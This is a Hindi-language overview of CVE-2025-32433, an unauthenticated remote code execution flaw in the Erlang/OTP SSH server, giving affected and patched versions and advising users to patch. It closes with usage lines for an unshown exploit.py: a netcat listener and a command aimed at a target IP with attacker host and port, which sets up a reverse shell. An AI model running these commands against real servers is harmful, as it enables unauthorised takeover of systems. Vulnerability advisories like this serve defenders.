
CVE-2025-32433 Summary and Attack Overview
CVE-2025-32433 सारांश और हमला अवलोकन
CVE-2025-32433 एक महत्वपूर्ण बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) भेद्यता है, जो Erlang/OTP SSH सर्वर में पाई गई है, जिसे 16 अप्रैल 2025 को प्रकट किया गया। Erlang/OTP SSH एक लाइब्रेरी है जिसका उपयोग विभिन्न वितरित और दूरसंचार अनुप्रयोगों में किया जाता है। यह दोष SSH प्रोटोकॉल संदेशों के अनुचित प्रबंधन से उत्पन्न होता है: सर्वर सामान्य प्रमाणीकरण अनुक्रम को लागू करने में विफल रहता है, जिससे हमलावर प्रमाणीकरण से पहले विशेष रूप से तैयार SSH संदेश भेज सकता है। ऐसा करके, हमलावर सर्वर पर मनमाना Erlang कोड इंजेक्ट और निष्पादित कर सकता है nvd.nist.gov offsec.com । व्यावहारिक रूप में, इसका अर्थ है कि एक हमलावर जिसके पास कमजोर Erlang/OTP SSH सर्वर (अक्सर रूट के रूप में चल रहा) तक नेटवर्क पहुंच है, वह बिना किसी क्रेडेंशियल के रिवर्स शेल शुरू कर सकता है या कमांड निष्पादित कर सकता है, जिससे पूर्ण सिस्टम समझौता हो सकता है nvd.nist.gov offsec.com । इस भेद्यता को CVSS 10.0 (अधिकतम गंभीरता) सौंपा गया है offsec.com ।
प्रभावित संस्करण OTP-27.3.3, OTP-26.2.5.11, या OTP-25.3.2.20 (पैच किए गए संस्करण) से नीचे के सभी Erlang/OTP रिलीज़ हैं nvd.nist.gov offsec.com । प्रभावित सिस्टम में अक्सर Linux सर्वर या उपकरण शामिल होते हैं जो Erlang-आधारित SSH डेमॉन चला रहे हैं (OpenSSH से भ्रमित न हों)। महत्वपूर्ण बात यह है कि Linux/BSD पर डिफ़ॉल्ट OpenSSH सर्वर कमजोर नहीं हैं offsec.com । उपयोगकर्ताओं को मान लेना चाहिए कि कोई भी उजागर Erlang/OTP SSH सर्वर प्रभावित है, और तुरंत आधिकारिक पैच लागू करें या SSH सेवा को अक्षम करें।
हमला SSH कनेक्शन शुरू करके और फिर SSH संदेशों के अनुक्रम को गलत क्रम में भेजकर काम करता है। :
उपयोग:
sudo chmod +x exploit.py
nc -nvlp
python3 exploit.py -t -p 22 --lhost --lport
उदाहरण:
nc -nvlp 5555
python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555